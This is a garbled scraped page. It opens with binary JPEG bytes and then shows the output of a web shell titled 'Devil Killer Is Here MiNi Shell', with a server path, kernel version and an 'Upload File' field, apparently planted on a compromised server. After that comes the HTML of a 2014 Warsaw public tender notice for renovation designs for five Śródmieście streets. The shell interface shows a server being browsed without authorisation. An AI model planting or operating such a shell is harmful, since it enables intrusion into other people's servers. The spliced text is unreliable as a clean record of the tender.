JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20141017/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20141017/347260-N-2014.html

<p class="kh_header"><b>Warszawa: Wykonanie projektów budowlano - wykonawczych remontu wraz z pełnieniem nadzorów autorskich dla ulic: Bugaj na odc. ul. Mostowa - ul. Steinkellera, Jazdów, Kościelnej, Koźlej i Oleandrów,położonych w Dzielnicy Śródmieście m. st. Warszawy.</b><br>
<b>Numer ogłoszenia: 347260 - 2014; data zamieszczenia: 17.10.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Terenów  Publicznych , ul. Podwale 23, 00-261 Warszawa, woj. mazowieckie, tel. 22 27 70500, faks 22 27 70503.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://www.ztp.waw.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie projektów budowlano - wykonawczych remontu wraz z pełnieniem nadzorów autorskich dla ulic: Bugaj na odc. ul. Mostowa - ul. Steinkellera, Jazdów, Kościelnej, Koźlej i Oleandrów,położonych w Dzielnicy Śródmieście m. st. Warszawy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Wykonanie projektów budowlano - wykonawczych remontu wraz z pełnieniem nadzorów autorskich dla ulic: Bugaj na odc. ul. Mostowa - ul. Steinkellera, Jazdów, Kościelnej, Koźlej i Oleandrów,
położonych w Dzielnicy Śródmieście m. st. Warszawy.
Opis przedmiotu zamówienia
1. Przedmiot zamówienia składa się z pięciu części (A, B, C, D i E) i obejmuje wykonanie projektów budowlano - wykonawczych remontu następujących ulic wraz z pełnieniem nadzorów autorskich:
Część A: Projekt remontu nawierzchni i oświetlenia ulicy Bugaj na odc. ul. Mostowa - ul. Steinkellera,
Część B: Projekt remontu nawierzchni i oświetlenia ulicy Jazdów,
Część C: Projekt remontu nawierzchni i oświetlenia ulicy Kościelnej,
Część D: Projekt remontu nawierzchni ulicy Koźlej,
Część E: Projekt remontu nawierzchni i oświetlenia ulicy Oleandrów.

2.  Przedmiot zamówienia określają:
1) Nazwa i kod CPC:
71.00.00.00 - 8 - usługi architektoniczne, budowlane, inżynieryjne i kontrolne,
71.32.00.00 - 7 - usługi inżynieryjne z zakresu projektowania,
71.24.80.00 - 8 - nadzór nad projektem i dokumentacją.
2) Szczegółowy opis przedmiotu zamówienia stanowiący odpowiednio załączniki: nr 1A dla części A, nr 1B dla części B, 1C dla części C, 1D dla części D, 1E dla części E do SIWZ
i odpowiednio: zał. nr 1A, nr 1B, nr 1C, nr 1D i 1E do Umowy.
3) plan sytuacyjny stanowiący odpowiednio załączniki: nr 2A dla części A, nr 2B dla części B,
nr 2C dla części C, nr 2D dla części D, nr 2E dla części E do SIWZ i odpowiednio: 
zał. nr 2A, nr 2B, nr 2C, nr 2D i nr 2E do Umowy.
4) Wzór umowy stanowiący załącznik nr 10 do SIWZ.
Sposób opisu urządzeń i materiałów przewidywanych do zastosowania spełniać musi wymogi dotyczące sposobu opisu przedmiotu zamówienia na roboty budowlane, wynikające z art. 29-31 ustawy Prawo zamówień publicznych. Wskazanie w dokumentacji na znak towarowy, patent lub pochodzenie może nastąpić tylko w wyjątkowej sytuacji, tj. gdy przedmiotu zamówienia nie można opisać za pomocą dostatecznie dokładnych określeń, a wskazaniu takiemu muszą towarzyszyć wyrazy (lub równoważny). Należy wówczas określić parametry graniczne (brzegowe), na podstawie których można będzie stwierdzić równoważność zaoferowanych rozwiązań, technologii..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>1. Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających, o których mowa
w art. 67 ust. 1 pkt. 6 ustawy Pzp stanowiących nie więcej niż 50% wartości zamówienia podstawowego, polegających na powtórzeniu tego samego rodzaju zamówień.
2.  Przewiduje się możliwość udzielenia zamówienia uzupełniającego na wykonanie aktualizacji kosztorysów inwestorskich oraz projektów organizacji ruchu dla każdej z 5 (pięciu) części (A, B, C, D, E) przedmiotu zamówienia.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7, 71.24.80.00-8.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.06.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Wykonawca przystępujący do postępowania jest zobowiązany wnieść wadium na okres związania ofertą dla całości zamówienia w wysokości: 5 300,00 (słownie złotych: pięć tysięcy trzysta 00/100);
W przypadku składania ofert częściowych ustala się wadium:
- dla części A w wysokości  1 400,00 zł,
- dla części B w wysokości  1 400,00 zł,
- dla części C w wysokości     900,00 zł,
- dla części D w wysokości    700,00 zł,
- dla części E w wysokości     900,00 zł
Wykonawca składający ofertę na więcej niż jedną część zamówienia powinien wnieść wadium
w kwocie wynikającej z sumy wadium dla poszczególnych części zamówienia, których dotyczy złożona oferta.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca 
w ramach:
1. posiadania wiedzy i doświadczenia wykazał wykonanie w okresie ostatnich trzech (3) lat przed upływem terminu składania ofert:
- co najmniej 2 (dwóch) zamówień dotyczących projektów remontu lub budowy nawierzchni drogowych, w tym 1 (jednego) zamówienia dotyczącego wykonania projektu nawierzchni na terenie 
znajdującym się pod ochroną Konserwatora Zabytków, których wartość wynosi
min. 20 000,00 zł brutto każde (słownie złotych: dwadzieścia tysięcy)
oraz załączy dowody potwierdzające, że wykazane projekty zostały wykonane należycie (zgodne w treści z załącznikiem nr 7 do SIWZ).
Zrealizowane zamówienia należy wykazać według załączonego wzoru, który stanowi załącznik nr 7 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wymagane jest dysponowanie min. 3 osobami, w tym:
- 1 osobą posiadającą uprawnienia do projektowania w specjalności drogowej,
- 1 osobą posiadającą uprawnienia do projektowania w specjalności instalacji i urządzeń
elektrycznych (nie dotyczy oferentów składających ofertę tylko na część D),
- 1 osobą posiadającą doświadczenie w  projektowaniu  obiektów architektury   krajobrazu w zakresie zieleni miejskiej tj.: parków, zieleńców lub zieleni przyulicznej, (nie dotyczy oferentów składających ofertę tylko na część C i/lub D)
z podaniem zakresu wykonywanych przez nie czynności przy wykonywaniu zamówienia oraz podaniem informacji o podstawie do dysponowania tą/ymi osobą/ami.
Dysponowane osoby należy wykazać wg wzoru, który stanowi załącznik nr 8 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna, że wykonawca spełnia warunki udziału w postępowaniu, gdy wykonawca w ramach wykazania się sytuacją ekonomiczną i finansową osiągnął w okresie ostatnich 3 lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres, przychód ze sprzedaży produktów 
(dla wykonawców prowadzących pełną księgowość) lub przychód z działalności (dla wykonawców niezobowiązanych do sporządzania bilansu) minimum łącznie w wyżej wymienionym okresie 500 000,00 złotych (słownie złotych: pięćset tysięcy), według załączonego wzoru, który stanowi załącznik nr 9 do SIWZ,
oraz gdy złoży prawidłowo dokumenty wymienione w pkt. 10 SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w części, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości, również opinię odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego, innych dokumentów określających obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe, a jeżeli okres prowadzenia działalności jest krótszy - za ten okres;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">inne dokumenty</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.	Do oferty (Formularz ofertowy musi być zgodny w treści ze wzorem formularza ofertowego stanowiącego załącznik nr 3a do SIWZ), muszą być załączone:
    Wycena: Wykonawca określa cenę wykonania przedmiotu zamówienia wymienionego
w pkt. 7 SIWZ, tj. dla każdej wybranej z pięciu części A, B, C, D i E sporządzając odrębne szczegółowe wyceny (w zakresie prac projektowych sporządzone wg aktualnie obowiązującego cennika Środowiskowe zasady wycen prac projektowych - wydanego przez Izbę Projektowania Budowlanego), uwzględniając wszystkie pozycje, zgodnie z zakresem określonym w załącznikach:
- nr 1A do SIWZ - zakres projektu dla części A - ul. Bugaj odc. ul. Mostowa - ul. Steikellera - (pkt. 1, 2, 4, 5, 6, 7, 8a, 8b, 8c, 8d, 8e, 8f),
- nr 1B do SIWZ - zakres projektu dla części B - ul. Jazdów - (pkt. 1, 2, 3, 4, 5, 6, 7, 8a, 8b, 8c, 8d, 8e, 8f),
- nr 1C do SIWZ - zakres projektu dla części C - ul. Kościelna - (pkt. 1, 2, 3, 4a, 4b, 4c, 4d, 4e, 4f),
- nr 1D do SIWZ - zakres projektu dla części D - ul. Koźla - (pkt. 1, 2, 3a, 3b, 3c, 3d, 3e),
- nr 1E do SIWZ - zakres projektu dla części E - ul. Oleandrów - (1, 2, 3, 4, 5, 6a, 6b, 6c, 6d, 6e).
2. Pełnomocnictwo określające jego zakres i udzielone (podpisane) przez osoby uprawnione do reprezentacji wykonawcy - w przypadku, gdy wykonawcę reprezentuje pełnomocnik.
4. Pełnomocnictwo do reprezentacji w postępowaniu albo reprezentowanie w postępowaniu i zawarcie umowy w sprawie zamówienia publicznego - w przypadku, gdy wykonawcy wspólnie ubiegają się 
o udzielenie zamówienia.
5.Zobowiązanie do udostępnienia zasobów niezbędnych do wykonania zamówienia
w przypadku gdy wykonawca wykazując spełnianie warunków udziału w postępowaniu polega na zasobach innych podmiotów określonych w pkt. 10.2. i 10.3. SIWZ.
6. Potwierdzenie wniesienia wadium wg wymagań określonych w Części VI pkt. 21 - 23 SIWZ.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ztp.waw.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> ul. Podwale 23, 00-261 Warszawa, pok. Nr 9 (parter) cena formularza 50 zł. Kwotę należy wpłacić na konto Zamawiającego: ZTP Bank Handlowy Warszawa S.A. Nr 88103015080000000550890003.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.10.2014 godzina 10:00, miejsce: Siedziba Zarządu Terenów Publicznych przy ul. Podwale 23 w Warszawie w Biurze Obsługi Mieszkańców (Kancelaria) parter.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 001 <b>NAZWA:</b> Projekt remontu nawierzchni i oświetlenia ulicy Bugaj na odc. ul. Mostowa - ul. Steinkellera,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy opis przedmiotu zamówienia stanowiący odpowiednio załączniki: nr 1A dla części A, nr 1B dla części B, 1C dla części C, 1D dla części D, 1E dla części E do SIWZ
i odpowiednio: zał. nr 1A, nr 1B, nr 1C, nr 1D i 1E do Umowy.
3) plan sytuacyjny stanowiący odpowiednio załączniki: nr 2A dla części A, nr 2B dla części B,
nr 2C dla części C, nr 2D dla części D, nr 2E dla części E do SIWZ i odpowiednio: 
zał. nr 2A, nr 2B, nr 2C, nr 2D i nr 2E do Umowy.
4) Wzór umowy stanowiący załącznik nr 10 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.06.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 002 <b>NAZWA:</b> B: Projekt remontu nawierzchni i oświetlenia ulicy Jazdów,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Szczegółowy opis przedmiotu zamówienia stanowiący odpowiednio załączniki: nr 1A dla części A, nr 1B dla części B, 1C dla części C, 1D dla części D, 1E dla części E do SIWZ
i odpowiednio: zał. nr 1A, nr 1B, nr 1C, nr 1D i 1E do Umowy.
2) plan sytuacyjny stanowiący odpowiednio załączniki: nr 2A dla części A, nr 2B dla części B,
nr 2C dla części C, nr 2D dla części D, nr 2E dla części E do SIWZ i odpowiednio: 
zał. nr 2A, nr 2B, nr 2C, nr 2D i nr 2E do Umowy.
3) Wzór umowy stanowiący załącznik nr 10 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 003 <b>NAZWA:</b> C: Projekt remontu nawierzchni i oświetlenia ulicy Kościelnej,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Szczegółowy opis przedmiotu zamówienia stanowiący odpowiednio załączniki: nr 1A dla części A, nr 1B dla części B, 1C dla części C, 1D dla części D, 1E dla części E do SIWZ
i odpowiednio: zał. nr 1A, nr 1B, nr 1C, nr 1D i 1E do Umowy.
2) plan sytuacyjny stanowiący odpowiednio załączniki: nr 2A dla części A, nr 2B dla części B,
nr 2C dla części C, nr 2D dla części D, nr 2E dla części E do SIWZ i odpowiednio: 
zał. nr 2A, nr 2B, nr 2C, nr 2D i nr 2E do Umowy.
3) Wzór umowy stanowiący załącznik nr 10 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 004 <b>NAZWA:</b> D: Projekt remontu nawierzchni ulicy Koźlej,.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Szczegółowy opis przedmiotu zamówienia stanowiący odpowiednio załączniki: nr 1A dla części A, nr 1B dla części B, 1C dla części C, 1D dla części D, 1E dla części E do SIWZ
i odpowiednio: zał. nr 1A, nr 1B, nr 1C, nr 1D i 1E do Umowy.
2) plan sytuacyjny stanowiący odpowiednio załączniki: nr 2A dla części A, nr 2B dla części B,
nr 2C dla części C, nr 2D dla części D, nr 2E dla części E do SIWZ i odpowiednio: 
zał. nr 2A, nr 2B, nr 2C, nr 2D i nr 2E do Umowy.
3) Wzór umowy stanowiący załącznik nr 10 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7, 71.24.80.00-8.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.04.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 005 <b>NAZWA:</b> E: Projekt remontu nawierzchni i oświetlenia ulicy Oleandrów..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1) Szczegółowy opis przedmiotu zamówienia stanowiący odpowiednio załączniki: nr 1A dla części A, nr 1B dla części B, 1C dla części C, 1D dla części D, 1E dla części E do SIWZ
i odpowiednio: zał. nr 1A, nr 1B, nr 1C, nr 1D i 1E do Umowy.
2) plan sytuacyjny stanowiący odpowiednio załączniki: nr 2A dla części A, nr 2B dla części B,
nr 2C dla części C, nr 2D dla części D, nr 2E dla części E do SIWZ i odpowiednio: 
zał. nr 2A, nr 2B, nr 2C, nr 2D i nr 2E do Umowy.
3) Wzór umowy stanowiący załącznik nr 10 do SIWZ..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.32.00.00-7, 71.24.80.00-8.</p></li>
